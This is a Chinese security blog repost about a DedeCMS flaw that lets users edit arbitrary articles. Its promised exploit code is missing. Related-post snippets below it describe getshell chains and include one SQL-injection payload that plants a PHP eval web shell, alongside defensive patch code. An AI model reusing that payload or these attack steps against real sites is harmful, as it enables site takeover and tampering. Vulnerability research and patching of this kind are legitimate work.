DEDECMS任意修改文章漏洞 附EXP

最新推荐文章于 2023-09-02 21:37:22 发布
转载 最新推荐文章于 2023-09-02 21:37:22 发布 · 1k 阅读 · 0
文章标签:

#join #upload #include #action #input #class

本文介绍了一个CMS系统的严重漏洞,该漏洞允许攻击者绕过正常权限校验,非法修改任意文章内容。通过分析代码流程,详细解释了如何利用未验证的文章ID参数实现非法操作。

这个漏洞不足以得到马儿 但能修改任何文章 也算是一个严重的漏洞!
废话不说  
经典对白 看代码!
member/soft_edit.php

 

 

 

//输出了  idhash 这个很重要  
//这样就得到了要修改文章的idhash

//然后用修改文章的文件去利用
看代码
archives_edit.php

 

 

 

 

现在看下archives_check_edit.php这个文件

 

 

 

 

//这样就成功修改文章了

 

EXP:

 

 

 

 

 

 

 

Yatere
关注
渗透实战:dedeCMS任意用户密码重置到内网getshell
zz12345600354的博客
05-29 1089
DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。通过信息泄露,攻击者可以获取到网站的用户的用户名和一些敏感信息,然后通过利用任意密码重置漏洞,在不知道原密码的情况下,重置管理员账号的密码,从而获取管理员权限。接着,攻击者可以通过后台getshell,获取网站的控制权,进而进行各种恶意操作,如上传恶意文件、篡改网站内容、窃取用户信息等。
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 4008
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
dedecms最新版本修改任意管理员漏洞
cnbird's blog
06-07 2288
http://www.unhonker.com/bug/1272.html 此漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php   if
dedecms最新版本修改任意管理员漏洞+getshell+exp
weixin_30439067的博客
08-03 4283
漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
【转】dedecms最新版本修改任意管理员漏洞 getshell exp
ITfinder
06-30 648
漏洞无视gpc转义,过80sec注入防御。 补充下,不用担心后台找不到。这只是一个demo,都能修改任意数据库了,还怕拿不到SHELL? 起因是全局变量$GLOBALS可以被任意修改,随便看了下,漏洞一堆,我只找了一处。 include/dedesql.class.php: if(isset($GLOBALS['arrs1'])) { $v1 = $v2 = ''; ...
漏洞名称:DedeCms全局变量覆盖漏洞
weixin_34007020的博客
01-16 325
漏洞地址:/include/common.inc.php 临时解决方案: 在/include/common.inc.php中 找到注册变量的代码 foreach(Array('_GET','_POST','_COOKIE')as$_request){foreach($$_requestas$_k=>$_v)${$_k}=_RunMagicQu...
php覆盖的解释,DEDECMS全局变量覆盖漏洞详解
weixin_36380063的博客
03-10 203
DEDECMS全局变量覆盖漏洞最早是狼族安全小组09年公布的,官方硬撑到现在没修补漏洞,到现在基本上覆盖了DEDECMS全部的版本。个人猜想是不是官方故意留下的后门。下面稍微介绍下这个漏洞,大牛们可以完全无视:一. 了解PHP超级全局变量下面是PHP的超级全局变量,可以了解一个特性,全是数组。$GLOBALS, 所有全局变量数组$_SERVER, 服务器环境变量数组$_GET,通过GET方法传递给...
0day-Exp
05-13
Dedecms 是一款广泛使用的开源CMS,如果这个exp包包含了针对它的0day漏洞,那么对于使用该系统的网站来说,可能面临极大的安全风险。攻击者可能通过这些exploit来非法获取网站的控制权,篡改内容,甚至植入恶意代码...
XSS漏洞概述及使用
一颗小松子.的博客
01-23 1700
XSS 漏洞概述 简介 XSS作为OWASP TOP 10 之一 XSS被称为跨站脚本攻击(Cross-site scripting),本来应该缩写为CSS,但是由于和CSS(Cascading Style Sheets,层叠样式脚本)重名, 所以更名为XSS。XSS(跨站脚本攻击) 主要基于javascript (JS) 完成恶意的攻击行为。 JS可以非常灵活的操作html,css和浏览器,这使得XSS攻击的"想象"空间特别大。 XSS通过将精心构造的代码(JS)代码注入到网页中,并由浏览器解释运
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6301
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
任意文件读取及漏洞复现
来日可期的博客
08-31 5450
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
任意文件读取和漏洞复现
weixin_58954236的博客
09-02 7034
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要读权限。
修复路径穿越、任意文件写入漏洞
InterestAndFun的博客
02-23 9201
前段时间随手写的一个文件上传服务,在公司的渗透测试下漏洞百出,其中少不了路径穿越和任意文件写入漏洞。其实这两个漏洞的修复并不复杂,只要对入参进行两个条件的校验就可以了。
CVE-2020-1066 任意文件替换漏洞分析和利用
被遗弃的庸才博客
03-07 1239
1、背景 漏洞是作者cbwang505发现的,并且作者本人在他的GitHub上传了EXP的利用代码,由于这个和RPC相关,自己也研究过RPC,所以分析了一下。但是在具体实现过程中自己遇到了很多问题,这里将它记录下来,同时帮助想要了解任意文件替换漏洞的同学入门(虽然自己也是菜狗)。任意文件替换漏洞的原理可以在这里了解一下,本文也会简单介绍一下任意文件替换漏洞是怎么产生的,以及我们怎么去利用。 首先每一个文件和文件夹都有它的访问属性如下所示,每一个用户对它的操作权限也不尽相同,从下面两张图可以看出syste
Lanproxy 任意文件读取漏洞复现 (CVE-2021-3019)
m0_48520508的博客
02-04 655
0x00简介 lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面…)。目前市面上提供类似服务的有花生壳、TeamView、GoToMyCloud等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据安全也是一大隐患。 0x01漏洞概述 Lanproxy1.0通过…/绕过读取任意文件。该漏洞允许目录遍历读取/…/conf/
dedecms漏洞getshell EXP最新可用
weixin_33674976的博客
06-18 597
构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\’`,’{dede:php}file_put_contents(”90sec.php”,”<?php eval($_POST[guige]);?>”);{/dede:php}’) # @`\’`EXP:http://www.xxx.org/plus/download...
member soft add.php,CMS上传漏洞修复
weixin_30768979的博客
04-13 457
近段时间老是发现网站title被注入其他信息,应该是被植入***还是什么的,非常困闹,在网站找了一些漏洞的修补方法。任意文件上传漏洞修复一、/include/dialog/select_soft_post.php文件,搜索(大概在72行的样子)$fullfilename = $cfg_basedir.$activepath.'/'.$filename;修改为if (preg_match('#\...
根据虹软实现的 人脸检测、追踪、识别、年龄检测、性别检测 的JAVA解决方案
09-11
打开下面链接,直接免费下载资源: https://renmaiwang.cn/s/vxfyv (最新版、最全版本)根据虹软实现的 人脸检测、追踪、识别、年龄检测、性别检测 的JAVA解决方案
matlab YALMIP、GLPK安装资源
最新发布
09-11
matlab的YALMIP、GLPK安装包,内置YALMIP、GLPK,直接将分别其添加到matlab的toolbox、路径中即可(matlab主页-设置路径-添加并包含子文件夹-YALMIP;matlab主页-设置路径-添加文件夹-github_repo)
dedecms v57sp1漏洞
02-25
### DedeCMS V5.7 SP1 安全漏洞详情 #### 远程文件包含漏洞 DedeCMS V5.7 SP1 版本存在远程文件包含漏洞,该漏洞允许攻击者通过特定参数注入恶意代码并执行任意命令。此漏洞的根本原因在于 `index.php` 文件中的 `$insLockfile` 参数未经过充分验证即被使用[^1]。 ```php if(file_exists($insLockfile)) { // 处理逻辑... } ``` 为了防止此类攻击,在修补方案中可以考虑将 `if(file_exists($insLockfile))` 的判断提前到参数覆盖之前的位置,从而减少潜在风险。然而,这种修改可能会影响其他功能的正常运行,因此需谨慎处理。 #### 开放重定向漏洞 (CVE-2024-57241) 另一个值得注意的是开放重定向漏洞,存在于较低版本的 DedeCMS 中。当应用程序未能正确过滤 URL 输入时,可能导致用户被引导至恶意网站。官方已发布更新补丁,推荐用户尽快升级至最新稳定版 DedeCMSV5.7.65 来解决这一问题[^2]。 ### 解决方案与预防措施 针对上述提到的安全隐患,建议采取以下几种方式来加强系统的安全性: - **及时更新软件**:定期访问官方网站获取最新的安全公告和技术支持文档,确保使用的 CMS 是最新版本。 - **增强输入校验**:对于所有外部传入的数据都要严格检验其合法性,特别是涉及路径名、URL 地址等敏感信息的地方应特别注意。 - **启用请求检查机制**:可以在全局配置文件里加入如下代码片段以强化对 HTTP 请求头字段的审查力度[^3]: ```php function CheckRequest(&$data){ foreach ($data as $key => &$val) { if (!preg_match('/^[a-zA-Z0-9_\.\-\[\]]+$/', $key)){ die('Invalid request'); } unset($val); } } CheckRequest($_GET); CheckRequest($_POST); CheckRequest($_REQUEST); CheckRequest($_COOKIE); ``` - **利用第三方工具辅助检测**:借助专业的 Web 应用防火墙(WAF),以及像 360 网站安全监测这样的在线服务平台来进行全面体检,以便第一时间发现隐藏的风险点。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值